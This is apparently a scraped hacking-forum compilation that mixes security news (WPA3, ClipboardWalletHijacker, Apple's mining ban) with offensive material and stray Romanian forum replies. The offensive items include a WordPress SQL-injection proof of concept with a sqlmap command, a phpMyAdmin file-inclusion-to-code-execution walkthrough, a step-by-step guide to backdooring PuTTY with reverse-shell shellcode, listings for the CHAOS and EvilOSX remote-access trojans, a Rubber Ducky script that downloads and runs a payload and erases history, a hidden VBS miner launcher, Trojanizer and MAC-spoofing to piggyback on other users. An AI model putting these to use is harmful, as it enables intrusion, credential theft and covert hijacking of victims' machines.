Fi8sVrs

The Wi-Fi Alliance today officially launched WPA3—the next-generation Wi-Fi security standard that promises to eliminate all the known security vulnerabilities and wireless attacks that are up today including the dangerous KRACK attacks. WPA, or Wi-Fi Protected Access, is a standard designed to authenticate wireless devices using the Advanced Encryption Standard (AES) protocol and is intended to prevent hackers from eavesdropping on your wireless data. However, in late last year, security researchers uncovered a severe flaw in the current WPA2 protocol, dubbed KRACK (Key Reinstallation Attack), that made it possible for attackers to intercept, decrypt and even manipulate WiFi network traffic. Although most device manufacturers patched their devices against KRACK attacks, the WiFi Alliance, without much delay, rushed to finalize and launch WPA3 in order to address WPA2's technical shortcomings from the ground. What is WPA3? What New Security Features WPA3 Offers? WPA3 security standard will replace the existing WPA2 that has been around for at least 15 years and widely used by billions of devices every day. The new security protocol provides some big improvements for Wi-Fi enabled devices in terms of configuration, authentication, and encryption enhancements, making it harder for hackers to hack your Wi-Fi or eavesdrop on your network. On Monday, the Wi-Fi Alliance launched two flavors of latest security protocol—WPA3-Personal and WPA3-Enterprise—for personal, enterprise, and IoT wireless networks. Here are some key features provided by the new protocol: 1.) Protection Against Brute-Force Attacks WPA3 provides enhanced protection against offline brute-force dictionary attacks, making it harder for hackers to crack your WiFi password—even if you choose less complex passwords—by using commonly used passwords over and over again. 2.) WPA3 Forward Secrecy WPA3 leverages SAE (Simultaneous Authentication of Equals) handshake to offer forward secrecy, a security feature that prevents attackers from decrypting old captured traffic even if they ever learn the password of a network. 3.) Protecting Public/Open Wi-Fi Networks WPA3 strengthens user privacy in open networks through individualized data encryption, a feature that encrypts the wireless traffic between your device and the Wi-Fi access point to mitigate the risk of Man-in-the-Middle (MitM) attacks. To prevent such passive attacks, WPA3 could add support for Opportunistic Wireless Encryption (OWE). 4.) Strong Encryption for Critical Networks Using WPA3 Enterprise, critical Wi-Fi networks handling sensitive information (such as government, , and industrial organizations), can protect their Wi-Fi connections with 192-bit encryption. Wi-Fi Easy Connect Alongside WPA3, the WiFi Alliance has also announced a new feature, called Wi-Fi Easy Connect, that simplifies the process of pairing smart home gadgets (without any screen or display) to your router. Wi-Fi Easy Connect is a replacement for Wi-Fi Protected Setup (WPS), which has been considered insecure. With the support for Easy Connect, you will be able to pair your smart gadget with the router by simply scanning a QR code with your smartphone to have the Wi-Fi credentials automatically sent to the new smart device. It should be noted that both WPA3 and Wi-Fi Easy Connect will not hit the mainstream right away. In fact, it is going to be a many-years-long process that will require new routers and smart gadgets to support WPA3. Therefore, WPA2 will not stop working any time soon, and devices with WPA3 support will still be able to connect with devices that use WPA2 for the working of your gadgets, but WPA3 support will eventually become mandatory as adoption grows. WPA3 is set to roll out later this year and is expected to hit mass adoption in late 2019, when it eventually become a requirement for devices to be considered Wi-Fi certified, according to the WiFi Alliance. Via thehackernews.com

ba da, doar ca nici unul din top nu mi-a detectat niste rootkit-uri scrise de independent parca...

restul care? am cautat ceva serios zilele trecute si nimic

Project Cerium : Antivirus Open Source Antivirus For Humans How to Use clone the repo : git clone https://github.com/xedtech/ceriumav.git cd ceriumav python3 av.py Screenshots Source

WordPress iThemes Security plugin versions prior to 7.0.3 suffer from a remote SQL injection vulnerability. # Exploit Title: WordPress Plugin iThemes Security(better-wp-security) <= 7.0.2 - Authenticated SQL Injection # Date: 2018-06-25 # Exploit Author: Alirim Emini # Website: https://www.sentry.co.com/ # Vendor Homepage: https://ithemes.com/ # Software Link: https://wordpress.org/plugins/better-wp-security/ # Version/s: 7.0.2 and below # Patched Version: 7.0.3 # CVE : 2018-12636 # WPVULNDB: https://wpvulndb.com/vulnerabilities/9099 Plugin description: iThemes Security works to lock down WordPress, fix common holes, stop automated attacks and strengthen user credentials. With advanced features for experienced users, this WordPress security plugin can help harden WordPress. Description: WordPress Plugin iThemes Security(better-wp-security) before 7.0.3 allows remote authenticated users to execute arbitrary SQL commands via the 'orderby' parameter in the 'itsec-logs' page to wp-admin/admin.php. Technical details: Parameter orderby is vulnerable because backend variable $sort_by_column is not escaped. File: better-wp-security/core/admin-pages/logs-list-table.php Line 271: if ( isset( $_GET[' orderby '], $_GET['order'] ) ) { Line 272: $ sort_by_column = $_GET[' orderby ']; File: better-wp-security/core/lib/log-util.php Line 168: $query .= ' ORDER BY ' . implode( ', ', $ sort_by_column )); Proof of Concept (PoC): The following GET request will cause the SQL query to execute and sleep for 10 seconds if clicked on as an authenticated admin: http://localhost/wp-admin/admin.php?page=itsec-logs&filter=malware&orderby=remote_ip%2c(select*from(select(sleep(10)))a)&order=asc&paged=0 Using SQLMAP: sqlmap -u 'http://localhost/wp-admin/admin.php?page=itsec-logs&filter=malware&orderby=remote_ip*&order=asc&paged=0' --cookie "wordpress_b...; wordpress_logged_in_bbf...;" --string "WordPress" --dbms=MySQL --technique T --level 5 --risk 3 https://packetstormsecurity.com/files/148294/WordPress-iThemes-Security-SQL-Injection.html

jadx-gui --show-bad-code 1.app.apk

da-mi PM cu site-urile si vrei sa modifici la ele

Welcome to my next blog post. Today i want to show you some basic pentesting stuff. We will manually backdooring a PE-File, in this case the putty client. I used the following software setup: Windows 10 Pro 32 Bit Putty Stud_PE Immunity Debugger Before we are getting our hands into assembly, i want to explain what we will do. We will add a section header named .evil to our file and hijack the file‘s execution flow. At the entry point we will redirect the execution to our shellcode and after gaining our shell, the ordinary appliaction is running (putty starts). #0x01 Adding Section At first we are going to add our new section .evil to our file through Stud_PE. The following pictures are pritty self explaining I choosed a section size of 1500 Bytes which are filled with nullbytes. That‘s more than enough for our shellcode. After saving the file and load it into Immunity you can see the differences between the two files (new section .evil is spawned). And if you look at the adress of .evil you will see the following (our predifined nullbytes) -> Great! While checking our new section you may noticed, that the adresses has slighty changed. The last 4 Bytes are always nullbytes but the first 4 Bytes are changing through every reloading process of the file. 00FB0000 <-> 00250000 That‘s a kernel protection ASLR, you can find more information about this countermeasurement here. This makes some more work, but isn‘t a problem (more later). #0x02 Hijack Execution Flow Now we are looking at the entry point of our file in Immunity. The First instruction at 0x002B7FD6 is a call instruction. We are going to change the first instructions to jump into our code cave (.evil). Before changing any assembly instruction copy the ‚old‘ instructions to a text file, because we are going to resume to the application flow after executing our shellcode. Mark the first instruction and type „jmp [adress of .evil]“ in my case „jmp 0x002E3000“. After hitting enter you will see the following: Save the changes to a new file and open it in immunity. Now we are taking the first instruction with F7 and are landing in our code cave of nullbytes at the .evil adress. For our testing purpose we replace the nullbytes with nops. To do so just mark all the nullbytes of the code cave and do the following: We save the state of our registers on the top of the stack through the assembly instruction pushad && pushfd. At the end of our code cave we restore our register states with popfd and popad. So far no problems (hopefully). Now we do some math do encounter the ASLR protection. We want to restore all overwritten functions at the end of our code cave and jump right back into the „old“ execution flow. If you are looking at the entry ponit of our file, you will see that only the call instruction is missing. Without enabled ASLR we could use the saved adress from our textfile just like „call x002B8265“, but you see that the adress of the second instruction „jmp 0x002B7E6E“ has also changed… ASLR Hurray! What now? We have to determine the offset between the old adresses to calculate the new overwritten call instruction. Instead trying to explain the several locations, adresses and relations i try to show it in following pictures (if this isn‘t enough, plz tell me via twitter and i will add text sections) In the end we got the „new“ adress for our overwritten call instruction which is 0x13F8265. We place this call instruction right behind the restored registers (pushfd, pushad). Now we only need to jmp to the next ordinary instrution at the entry point via „jmp 0x01067FD8“ and the execution will flow. #0x03 Inject Shellcode Choose your favourit shellcode or generate a new one . I used following command: msfvenom -p windows/shell_reverse_tcp lhost=10.0.2.6 lport=1337 exitfunc=thread -f hex Then use the binary paste function of Immunity to replace some of our nops with the shellcode. Save the file and voila, you sucessfully backdoored a PE-File ! Ok, just one thing is missing. The shellcode of msfvenom used the WaitForSingleObject function and the default values prevent the application to execute until the shell is released. To solve this change the „DEC ESI“ code at the end of the shellcode with a nop. 0x04 PoC Start your listener and fire up the application. Thanks for reading and if you like this post, check my twitter account please! xD Source: hansesecure.de

Author: @Ambulong Security Team ChaMd5 disclose a Local File Inclusion vulnerability in phpMyAdmin latest version 4.8.1. And the exploiting of this vulnerability may lead to Remote Code Execution. In this article, we will use VulnSpy’s online phpMyAdmin environment to demonstrate the exploit of this vulnerability. VulnSpy’s online phpMyAdmin environment address: http://www.vulnspy.com/phpmyadmin-4.8.1/ Vulnerability Details 1.Line 54-63 in file /index.php: // If we have a valid target, let's load that script instead if (! empty($_REQUEST['target']) && is_string($_REQUEST['target']) && ! preg_match('/^index/', $_REQUEST['target']) && ! in_array($_REQUEST['target'], $target_blacklist) && Core::checkPageValidity($_REQUEST['target']) ) { include $_REQUEST['target']; exit; } 2.Core::checkPageValidity in /libraries/classes/Core.php /** * boolean phpMyAdmin.Core::checkPageValidity(string &$page, array $whitelist) * * checks given $page against given $whitelist and returns true if valid * it optionally ignores query parameters in $page (script.php?ignored) * * @param string &$page page to check * @param array $whitelist whitelist to check page against * * @return boolean whether $page is valid or not (in $whitelist or not) */ public static function checkPageValidity(&$page, array $whitelist = []) { if (empty($whitelist)) { $whitelist = self::$goto_whitelist; } if (! isset($page) || !is_string($page)) { return false; } if (in_array($page, $whitelist)) { return true; } $_page = mb_substr( $page, 0, mb_strpos($page . '?', '?') ); if (in_array($_page, $whitelist)) { return true; } $_page = urldecode($page); $_page = mb_substr( $_page, 0, mb_strpos($_page . '?', '?') ); if (in_array($_page, $whitelist)) { return true; } return false; } Core::checkPageValidity can be bypassed by using by double encoding like %253f. Exploit An attacker can use this vulnerability to include session file to lauching a Remote Code Execution vulnerability. 1.Use username root, password toor log into phpmyadmin. Login PMA 2.Run SQL query select '<?php phpinfo();exit;?>' Login PMA 3.Get your Session ID Session ID is the item phpMyAdmin in your cookie. Login PMA 4.Include the session file http://1a23009a9c9e959d9c70932bb9f634eb.vsplate.me/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_11njnj4253qq93vjm9q93nvc7p2lq82k Login PMA Source: blog.vulnspy.com

ARPPD ARP Poisoning Defender This is a small script I have written in C to provide protection against malicious ARP attacks, changing the gateway's MAC Address in the ARP table of a victim's PC. How it works The program saves the Gateway's MAC and IP Address when started. It then scans for every incoming ARP packet to see if it has the ARP Source of the gateway's ip. It blocks these packets (without a delay, like in other ARP defending scripts) using arptables, and instantly updates the ARP table to match the gateway's IP and MAC. It keeps the attacker's MAC address blocked for receiving ARP packets for 5 minutes. When the program exists, it allows all MAC addresses to send ARP packets again (to the PC running the script), as well as flushing the ARP table. Cross Platform For now, the script only works on linux. I will try to release a win64 version ASAP. Installation and build ARPPD needs arptables to run, so just install it: sudo apt-get install arptables There's a pre-built executable in the builds folder, or build it yourself: To build: Run compile_arppd_linux OR Go in the main directory Run: gcc -o builds/defender-win64 src-win64/defender.c -lpcap -pthread Malicious ARP Packets When the ARPPD will detect a malicious ARP Packet, it will look like this: Video Download: ARPPD-master.zip or git clone https://github.com/Prodicode/ARPPD.git Source

CHAOS allow generate payloads and control remote Windows systems. Disclaimer This project was created only for learning purpose. THIS SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. YOU MAY USE THIS SOFTWARE AT YOUR OWN RISK. THE USE IS COMPLETE RESPONSIBILITY OF THE END-USER. THE DEVELOPERS ASSUME NO LIABILITY AND ARE NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE CAUSED BY THIS PROGRAM. Features Reverse Shell Download File Upload File Screenshot Keylogger Persistence Open URL Remotely Get Operating System Name Run Fork Bomb Tested On Kali Linux - ROLLING EDITION How To Use # Install dependencies (You need Golang and UPX package installed) $ apt install golang xterm git upx-ucl -y # Clone this repository $ git clone https://github.com/tiagorlampert/CHAOS.git # Get and install external imports (requirement to screenshot) $ go get github.com/kbinani/screenshot && go get github.com/lxn/win $ go install github.com/kbinani/screenshot && go install github.com/lxn/win # Maybe you will see the message "package github.com/lxn/win: build constraints exclude all Go files". # It's occurs because the libraries are to windows systems, but it necessary to build the payload. # Go into the repository $ cd CHAOS # Run $ go run CHAOS.go Screenshot (outdated) Video Source

TROJANIZER Version release : v1.1 (Stable) Author : pedro ubuntu [ r00t-3xp10it ] Codename: Troia_Revisited Distros Supported : Ubuntu, Kali, Mint, Parrot OS Suspicious-Shell-Activity (SSA) RedTeam develop @2017 FRAMEWORK DESCRIPTION The Trojanizer tool uses WinRAR (SFX) to compress the two files input by user, and transforms it into an SFX executable(.exe) archive. The sfx archive when executed it will run both files (our payload and the legit appl at the same time). To make the archive less suspicious to target at execution time, trojanizer will try to replace the default icon(.ico) of the sfx file with a user-selected one, and supress all SFX archive sandbox msgs (Silent=1 | Overwrite=1). 'Trojanizer will not build trojans, but from target perspective, it replicates the trojan behavior' (execute the payload in background, while the legit application executes in foreground). DEPENDENCIES (backend applications) Zenity (bash-GUIs) | Wine (x86|x64) | WinRAr.exe (installed-in-wine) "Trojanizer.sh will download/install all dependencies as they are needed" ╔────────────────────────────────────────────────────────────────────────────────────────────╗ | It is recomended to edit and config the option: SYSTEM_ARCH=[ your_sys_arch ] | | in the 'settings' file before attempting to run the tool for the first time. | ╚────────────────────────────────────────────────────────────────────────────────────────────╝ PAYLOADS (agents) ACCEPTED .exe | .bat | .vbs | .ps1 "All payloads that windows/SFX can auto-extract-execute" HINT: If sellected 'SINGLE_EXEC=ON' in the settings file, then trojanizer will accept any kind of extension to be inputed. LEGIT APPLICATIONS ACCEPTED (decoys) .exe | .bat | .vbs | .ps1 | .jpg | .bmp | .doc | .ppt | etc .. "All applications that windows/SFX can auto-extract-execute" Advanced Settings Trojanizer and APPL Whitelisting Bypasses Framework Screenshots Video Tutorials Trojanizer - AVG anti-virus fake installer (trojan behavior) Trojanizer - single_file_execution (not trojan behavior) Download/Install 1º - Download framework from github git clone https://github.com/r00t-3xp10it/trojanizer.git 2º - Set files execution permitions cd trojanizer sudo chmod +x *.sh 3º - config framework nano settings 4º - Run main tool sudo ./Trojanizer.sh Source

While fuzzing is known to be a powerful mechanism for fingerprinting and enumerating bugs within hardware and software systems, the application of this technique to wireless systems remains nontrivial due to fragmented and siloed tools. Join us as we cover wireless fuzzing fundamentals and introduce a new tool to unify the approach across protocols, radios, and drivers. About the Speakers Matt Knight Matt Knight (@embeddedsec) is a center and left wing for the San Francisco Desert Owls ice hockey team. When his schedule allows he moonlights as a software engineer and security researcher, where he explores the boundaries between software, hardware, and wireless systems. With specific interests in RF networks and physical layers, he notably reverse engineered the LoRa PHY based on blind signal analysis. Matt holds a BE in Electrical Engineering from Dartmouth College. Ryan Speers Ryan Speers is a security researcher and developer who enjoys embedded systems, low-power radio protocols, and reversing proprietary systems. He has worked in offensive and defensive roles on networks, Windows, micro controllers, and many things in-between. As co-founder at River Loop Security, he tests embedded systems for security issues, and helps clients build more secure systems. He is also Director of Research for Ionic Security where he leads system and cryptographic research. He has previously spoken at a number of security conferences, including Troopers 14, and written some articles for journals ranging from peer-reviewed academic publications to PoC link: https://www.troopers.de/troopers18/agenda/rgdyd3/

Hidden.vbs Set WshShell = CreateObject("WScript.Shell") WshShell.Run chr(34) & "miner.bat" & Chr(34), 0 Set WshShell = Nothing Miner.bat minergate-cli --user email@gmail.com --xmr 1 Minergate https://minergate.com Source: fsecu

AlphaBay Market was by far the largest and most prolific provider of cyber crime and fraudulent services in the world prior to its seizure by the FBI on July 4, 2017. While the Tor-based marketplace was most famous for the sale of narcotics, firearms, and stolen goods, AlphaBay’s forum was the epicenter of the English-speaking cyber criminal community. During the site’s tenure, it provided a rich source of intelligence on the tactics, techniques, and operations of cyber criminal groups targeting a wide range of corporations and selling exfiltrated data through the marketplace securely and anonymously. This included visibility into the attack cycle, AlphaBay operating as a bridge between the English and Russian language cyber criminal communities, and the likely role of AlphaBay’s administrators in cryptocurrency market manipulation on a large scale. This presentation will discuss iDefense’s research into AlphaBay Market as a case study on how in-depth analysis of underground communities can contribute to an organization’s security posture. It will provide a detailed discussion of the tradecraft and methodologies used for underground intelligence, such as the use of undercover personas and how to apply social engineering techniques to gain additional intelligence. It will also discuss the strengths and weaknesses of such an approach and the risks associated with cyber underground collection. Finally, the case study will present lessons learned from engagement and analysis of criminal underground communities and how attendees can integrate cyber underground intelligence into their threat intelligence program. Christy Quinn (@ChristyQuinn), Security Specialist – Cyber Threat Intelligence, iDefense – Accenture Security

EvilOSX A pure python, post-exploitation, RAT (Remote Administration Tool) for macOS / OSX. Features Emulate a simple terminal instance Undetected by anti-virus (OpenSSL AES-256 encrypted payloads, HTTPS communication) Multi-threaded No client dependencies (pure python) Persistent Simple extendable module system Retrieve Chrome passwords Retrieve iCloud tokens and contacts Phish for iCloud passwords via iTunes Download and upload files Take a picture using the webcam Record microphone input iTunes iOS backup enumeration Retrieve or monitor the clipboard Retrieve browser history (Chrome and Safari) Attempt to get root via local privilege escalation Auto installer, simply run EvilOSX on your target and the rest is handled automatically How To Use The server side requires python3 to run (probably already installed on your system). # Clone or download this repository $ git clone https://github.com/Marten4n6/EvilOSX # Install dependencies required by the server $ sudo pip3 install -r requirements.txt # Go into the repository $ cd EvilOSX # Build a launcher to infect your target $ python builder.py # Start listening for connections $ python start.py # Lastly, run the built launcher on your target Because payloads are created unique to the target system (automatically by the server), the server must be running when any client connects for the first time. Screenshots Motivation This project was created to be used with my Rubber Ducky, here's the simple script: REM Download and execute EvilOSX @ https://github.com/Marten4n6/EvilOSX REM Also see https://ducktoolkit.com/vidpid/ DELAY 1000 GUI SPACE DELAY 500 STRING Termina DELAY 1000 ENTER DELAY 1500 REM Kill all terminals after x seconds STRING screen -dm bash -c 'sleep 6; killall Terminal' ENTER STRING cd /tmp; curl -s HOST_TO_EVILOSX.py -o 1337.py; python 1337.py; history -cw; clear ENTER Takes about 10 seconds to backdoor any unlocked Mac, which is...... nice Terminal is spelt that way intentionally, on some systems spotlight won't find the terminal otherwise. To bypass the keyboard setup assistant make sure you change the VID&PID which can be found here. Aluminum Keyboard (ISO) is probably the one you are looking for. Source

███████╗██╗ ██╗ █████╗ ██████╗ ██████╗ ██╗ ██╗ ██████╗ ██████╗ ██╗ ██╗ ██╔════╝██║ ██║██╔══██╗██╔══██╗██╔═══██╗██║ ██║ ██╔══██╗██╔═══██╗╚██╗██╔╝ ███████╗███████║███████║██║ ██║██║ ██║██║ █╗ ██║█████╗██████╔╝██║ ██║ ╚███╔╝ ╚════██║██╔══██║██╔══██║██║ ██║██║ ██║██║███╗██║╚════╝██╔══██╗██║ ██║ ██╔██╗ ███████║██║ ██║██║ ██║██████╔╝╚██████╔╝╚███╔███╔╝ ██████╔╝╚██████╔╝██╔╝ ██╗ ╚══════╝╚═╝ ╚═╝╚═╝ ╚═╝╚═════╝ ╚═════╝ ╚══╝╚══╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝ Lightweight Hypervisor-Based Kernel Protector Introduction of Shadow-Box Shadow-box is a security monitoring framework for operating systems using state-of-the-art virtualization technologies. Shadow-box has a novel architecture inspired by a shadow play. We made Shadow-box from scratch, and it is primarily composed of a lightweight hypervisor and a security monitor. The lightweight hypervisor, Light-box, efficiently isolates an OS inside a guest machine and projects static and dynamic kernel objects of the guest into the host machine so that our security monitor in the host can investigate the projected images. The security monitor, Shadow-Watcher, places event monitors on static kernel elements and tests security of dynamic kernel elements. Shadow-box manipulates address translations from the guest physical address to the host physical address in order to exclude unauthorized accesses to the host and the hypervisor spaces. In that way, Shadow-box can properly introspect the guest operating system and mediate all accesses, even when the operating system is compromised. Videos: Architecture of Shadow-Box We explain how we designed the Light-box and the Shadow-watcher. It is designed to support a lightweight and practical security monitoring framework using virtualization technologies. We developed a security monitoring framework, Shadow-box that keeps an OS safe by filtering out unauthorized accesses to important kernel elements and defending the integrity of kernel elements periodically. Shadow-box relies upon its two subparts: a lightweight hypervisor and a security monitor. The lightweight hypervisor, Light-box, efficiently isolates an OS inside a guest machine and projects static and dynamic kernel objects of the guest into the host machine, so that our security monitor in the host can investigate the projected images. The security monitor, Shadow-watcher, places event monitors on static kernel elements and tests security of dynamic kernel elements. Running inside the host, it can test the security of the guest without malicious interference even when the guest OS is compromised. If you want to know more about Shadow-box, please see my presentation and paper at Black Hat Asia 2017 and HITBSecConf 2017. How to Build How to Use Download: shadow-box-for-x86-master.zip or git clone https://github.com/kkamagui/shadow-box-for-x86.git Source

Facebook-Video-Downloader Version 1.0.0 Facebook Video Downloader (CLI) For Linux Systems Coded in PHP How To Use: git clone https://github.com/Tuhinshubhra/Facebook-Video-Downloader cd Facebook-Video-Downloader php fb.php enter URL for example ( https://www.facebook.com/cctvcom/videos/1410869539034155/ ) enter File Name DONE Mirror: fb.php <?php function curl($url) { $curl = curl_init($url); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.15 Safari/534.13"); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true); $content = curl_exec($curl); curl_close($curl); return $content; } system("clear"); echo " _____ _____ _____ _____ ____ _____ _____ ____ _____ _ _ _ _____ __ _____ _____ ____ _____ _____ | __| __ | | | | | \| __| | | \| | | | | | | | | | _ | \| __| __ | | __| __ -| | | |- -| | | __| | | | | | | | | | | | | | |__| | | | | | __| -| |__| |_____| \___/|_____|____/|_____|_____| |____/|_____|_____|_|___|_____|_____|__|__|____/|_____|__|__| VERSION 1.0.0 CREATED BY R3D#@X0r "; echo "\n\n"; echo "[#] Enter Video URL (https://www.facebook.com/user/video/id) : "; $v = trim(fgets(STDIN, 1024)); echo "\n\n[#] Enter Video Name To Save As : "; $name = trim(fgets(STDIN, 1024)); $url = str_replace('www', 'mbasic', $v); $s = curl($url); //echo $s; $vurl = preg_match('/<a href=\"\/video_redirect\/\?src\=(.*?)\"/ims', $s, $matches) ? $matches[1] : null; $vu = urldecode($vurl); echo "\n\n[+] Downloading... \n\n\n"; $d = 'wget -O "' . $name . '.mp4" --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6" "' . $vu . '" -q --show-progress'; system($d); echo "\n\n[+] Done.. Saved As : " . $name . ".mp4\n\n"; exit(0); ?> Source

Apple is worried about the battery drain from background cryptocurrency mining. [ Apple recently announced new restrictions on the use of cryptocurrencies on iPhones and iPads, a change first noticed by Apple Insider on Monday. "Apps may not mine for cryptocurrencies unless the processing is performed off device," Apple's app store guidelines for iOS now say. This requirement was absent from the same document just a few weeks ago. Apple's new policy is apparently motivated in part by concerns that cryptocurrency mining could drain the batteries of mobile devices. "Apps, including any third party advertisements displayed within them, may not run unrelated background processes, such as cryptocurrency mining," the policy states. Websites have been battling this issue for months: people submitting scammy ads to ad networks that hijack the user's CPU to mine cryptocurrency and send the profits back to the admaker. YouTube was briefly serving up these ads before Google noticed the problem and banned the ads. But Apple's new policy seems to go beyond obviously abusive cases of surreptitious cryptocurrency mining. The guidelines ban any on-device mining—even if users deliberately download an app whose explicit purpose is to mine for cryptocurrency. Devices running iOS are not likely to qualify as good mining hardware anyway. Bitcoin cryptocurrency mining has long been dominated by custom ASIC chips. Some other cryptocurrencies are designed to be ASIC-resistant, but even these are predominantly mined on high-end graphics cards with ample processing power and memory. An iPhone or iPad doesn't offer very much raw computing power per dollar, so it probably wouldn't make sense for someone to buy an iPhone or iPad to use as a mining device. Apple guidelines also now state that cryptocurrency apps "may not offer currency for completing tasks, such as downloading other apps, encouraging other users to download, posting to social networks." Apple's new policy takes effect at a time of growing concern over scammy behavior in the cryptocurrency world. Google and Facebook both banned cryptocurrency ads from their ad networks earlier this year. And the Securities and Exchange Commission has become increasingly aggressive about shutting down initial coin offerings that are fraudulent or otherwise break the law. Via arstechnica.com

Free Wifi This short tutorial describes a few methods for gaining access to the Internet, a basic human right, from public wireless networks. This tutorial has been tested on Mac and a Raspberry Pi. It should generally work on Linux, and hasn't been tested on Windows. Preparation Make sure you do this step before you are stuck without Internet access: Install Python pip On Linux, install Python Developer package, a dependency for the netifaces package. Ubuntu $ sudo apt-get install python-dev Fedora $ sudo dnf install python-devel Note: For Centos, substitute dnf with yum Make a copy of this repository and install dependencies for the script: $ git clone https://github.com/kylemcdonald/FreeWifi $ cd FreeWifi && sudo pip install -r requirements.txt How to get additional time If you had free internet access but your time has run out, the first thing to try is open an incognito/private window. Here are instructions for a few browsers: Chrome (mobile and desktop) Safari for iOS Safari for Mac Microsoft Edge An incognito/private window will temporarily clear any cookies that may have been used for tracking how much time you spent online, making you look like a "new user" and allowing you to log into the wireless portal again. Unfortunately, most systems track MAC addresses instead of cookies. A MAC address is a unique identifier assigned to every network interface. This means you need to get a new MAC address to get additional time. Fortunately, MAC addresses can be changed in software, without swapping the hardware. The spoof-mac command line utility makes this easy by entering sudo spoof-mac randomize Wi-Fi. If the command fails to run, try entering spoof-mac list --wifi to check what the name of your wireless device is first, and use that manually. After randomizing your MAC, try logging into the wireless portal again. When you're done using the Internet, run sudo spoof-mac reset Wi-Fi to reset your MAC address. Note that MAC address spoofing may be interpreted as an illegal activity depending on why you do it. In some cases it is certainly not illegal: recent mobile operating systems like iOS 8+ and Android 6+ automatically randomize their MAC address when searching for wireless networks to avoid being tracked. But when Aaron Swartz liberated JSTOR, MAC address spoofing was claimed as a signal of intention to commit a crime. How to get free access If the network is open, but you can't get access for some reason, you can also try spoofing the MAC address of a device that is already using the network. To the router, your device and the other device will look like one device. This can cause some minor problems if they interrupt each other, but for light browsing it usually works out fine. To find the MAC addresses of other devices using the network, first you need to connect to the network. You don't need to have Internet access, just a connection. First, on Mac OS run the command sudo chmod o+r /dev/bpf* once to make sure you can sniff wireless data (you need to do this again if you restart your computer). Then run the command python wifi-users.py. You should see a progress bar immediately: Available interfaces: en0 Interface: en0 SSID: nonoinflight Available gateways: en0 Gateway IP: 10.0.1.1 Gateway MAC: 00:e0:4b:22:96:d9 100%|██████████████████████████| 1000/1000 [00:46<00:00, 21.46it/s] Total of 5 user(s): 27:35:96:a8:66:7f 6359 bytes 36:fe:83:9c:35:eb 9605 bytes 65:01:3c:cc:20:e8 17306 bytes 8c:6f:11:2c:f0:ee 20515 bytes 0a:4f:b2:b8:e8:56 71541 bytes If there isn't much traffic on the network, it might take longer. If it's taking too long, type CTRL-C to cancel the sniffing and print whatever results are available. Finally, we want to spoof one of these MAC addresses. For example, in this case we would enter sudo spoof-mac set 0a:4f:b2:b8:e8:56 Wi-Fi to try spoofing the address with the most traffic (they probably have a connection). After running that command, try to access the Internet. If you don't have a connection, try the next MAC in the list. If your Internet connection drops out while using this MAC address, try disconnecting and reconnecting to the wireless network. Note that the original user of the MAC you copied may experience these same connection drop outs if you are both actively using the network. How it works wifi-users.py uses tcpdump to collect wireless packets. Then we look through these packets for any hints of the MAC address (BSSID) of our wireless network. Finally, we look for data packets that mention a user's MAC as well as the network BSSID (or the network gateway), and take note of that MAC using some amount of data. Then we sort the user's MACs by the total amount of data and print them out. Instead of sniffing wireless traffic, in some situations you can also use the command arp -a to get a list of MAC addresses of devices on the wireless network. Then you can either use spoof-mac to copy the address, or use ifconfig directly on Linux and OSX. For the specifics of using ifconfig look at the implementations of set_interface_mac inside SpoofMac's interfaces.py. This repository is dedicated to Lauren McCarthy, who has taught me the most about the art of getting a good deal. Source

@sergiu4995 https://github.com/kylemcdonald/FaceTracker edit: poti incerca Face Substitution Kyle McDonald References: https://www.auduno.com/clmtrackr/examples/facesubstitution.html https://github.com/kylemcdonald http://kylemcdonald.net/

The IT security researchers at Qihoo 360 Total Security have discovered a new malware aiming at stealing cryptocurrencies, including Bitcoin and Ethereum, from the computer system of unsuspected users. Dubbed ClipboardWalletHijacker by researchers; the malware is targeting at Windows-based devices and is currently installed on over 300,000 devices. As indicated by its name the malware monitors clipboard activity to identify what kind of cryptocurrencies the victim has stored in their wallet – In case the malware finds Bitcoin and Ethereum addresses it replaces them with the one used by cybercriminals behind the campaign. So far ClipboardWalletHijacker has stolen over 5 Bitcoin while its last activity was detected on June 12th, 2018, indicating that malware is still active and stealing funds. Recently, we have found that a lot of CryptoMiner Trojans are using this technique to steal victims’ cryptocurrencies. “We strongly recommend users to enable antivirus software while installing new applications”, said the company in their blog post. ClipboardWalletHijacker’s ability to replace wallet address by monitoring clipboard activity is not new, previously, CryptoShuffler Trojan was found following the same method to steal mainstream cryptocurrencies including Dash, Monero, Ethereum, Bitcoin, and Zcash, etc. In March this year, researchers spotted ComboJack malware which is actively stealing cryptocurrency by modifying victims addresses. Moreover, Evrial and Coinbitclip trojan was also caught monitoring clipboard activities of their victims to steal funds by replacing their wallet addresses. If you are investing in cryptocurrency make sure your system is secure and funds are properly protected. Additionally, cryptocurrency users are advised to avoid using online wallets to store their funds and move to hardware wallets. Here is a list of 5 secure Bitcoin wallets which you can trust. In January this year, researchers warned Internet proxy users to watch out for Tor Proxy since its owners were found replacing Bitcoin payment addresses to divert payments from ransomware victims to their own wallets. Via hackread.com

